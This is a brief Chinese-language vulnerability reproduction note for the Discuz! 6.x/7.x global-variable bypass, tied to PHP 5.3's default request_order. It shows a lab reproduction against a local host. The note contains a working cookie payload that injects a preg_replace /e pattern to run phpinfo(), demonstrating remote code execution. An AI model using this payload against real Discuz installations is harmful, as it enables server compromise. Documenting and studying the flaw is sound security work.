漏洞概述

由于php5.3.x版本里php.ini的设置里request_order默认值为GP,导致Discuz! 6.x/7.x 全局变量防御绕过漏洞

漏洞分析

https://www.secpulse.com/archives/2338.html

漏洞复现

首先来到一个已存在的帖子:

http://192.168.1.104:8080/viewthread.php?tid=13&extra=page%3D1

图片

打开BurpSuite抓包:

图片

在Cookie中增加:

1
GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo();

图片

从上图可以看到,phpinfo已成功执行!